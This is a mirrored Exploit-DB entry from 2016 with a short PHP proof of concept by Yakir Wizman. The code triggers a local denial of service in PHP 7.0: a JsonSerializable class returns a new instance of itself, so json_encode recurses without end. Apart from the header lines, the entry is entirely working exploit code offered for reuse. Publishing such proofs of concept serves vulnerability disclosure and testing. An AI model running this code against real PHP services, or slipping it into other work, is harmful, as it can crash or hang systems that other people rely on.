PHP 7.0 – JsonSerializable::jsonSerialize json_encode Local Denial of Service - 体验盒子

作者： Yakir Wizman

日期： 2016-08-31

类别：

dos

平台：

php

来源：https://www.exploit-db.com/exploits/40329/

<?php
#############################################################################
## PHP 7.0 JsonSerializable::jsonSerialize json_encode Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 7.0
## Date: 31/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
class jsonTmp implements JsonSerializable {
	function jsonSerialize() {
		$jsonTmp = new jsonTmp();
		return $jsonTmp;
	}
}
json_encode(new jsonTmp());
?>